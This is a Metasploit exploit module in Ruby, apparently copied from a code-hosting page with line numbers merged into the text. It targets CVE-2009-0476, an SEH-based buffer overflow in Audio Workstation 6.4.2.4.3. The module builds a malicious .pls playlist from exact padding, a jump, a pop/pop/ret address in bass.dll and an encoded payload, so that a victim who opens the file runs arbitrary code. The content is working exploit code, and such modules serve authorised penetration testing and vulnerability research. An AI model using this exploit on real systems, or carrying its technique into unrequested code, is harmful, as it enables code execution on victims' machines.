Path: blob/master/modules/exploits/windows/fileformat/audio_wkstn_pls.rb
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GoodRanking78include Msf::Exploit::FILEFORMAT9include Msf::Exploit::Remote::Seh1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Audio Workstation 6.4.2.4.3 pls Buffer Overflow',16'Description' => %q{17This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3.18When opening a malicious pls file with the Audio Workstation,19a remote attacker could overflow a buffer and execute20arbitrary code.21},22'License' => MSF_LICENSE,23'Author' => [ 'germaya_x', 'dookie', ],24'References' => [25[ 'CVE', '2009-0476' ],26[ 'OSVDB', '55424' ],27[ 'EDB', '10353' ],28],29'DefaultOptions' => {30'EXITFUNC' => 'seh',31'DisablePayloadHandler' => true,32'AllowWin32SEH' => true33},34'Payload' => {35'Space' => 4100,36'BadChars' => "\x00",37'StackAdjustment' => -3500,38'EncoderType' => Msf::Encoder::Type::AlphanumUpper,39'DisableNops' => true,40},41'Platform' => 'win',42'Targets' => [43[ 'Windows Universal', { 'Ret' => 0x1101031E } ], # p/p/r in bass.dll44],45'Privileged' => false,46'DisclosureDate' => '2009-12-08',47'DefaultTarget' => 0,48'Notes' => {49'Reliability' => UNKNOWN_RELIABILITY,50'Stability' => UNKNOWN_STABILITY,51'SideEffects' => UNKNOWN_SIDE_EFFECTS52}53)54)5556register_options(57[58OptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']),59]60)61end6263def exploit64sploit = rand_text_alpha_upper(1308)65sploit << "\xeb\x16\x90\x90"66sploit << [target.ret].pack('V')67sploit << make_nops(32)68sploit << payload.encoded69sploit << rand_text_alpha_upper(4652 - payload.encoded.length)7071print_status("Creating '#{datastore['FILENAME']}' file ...")72file_create(sploit)73end74end757677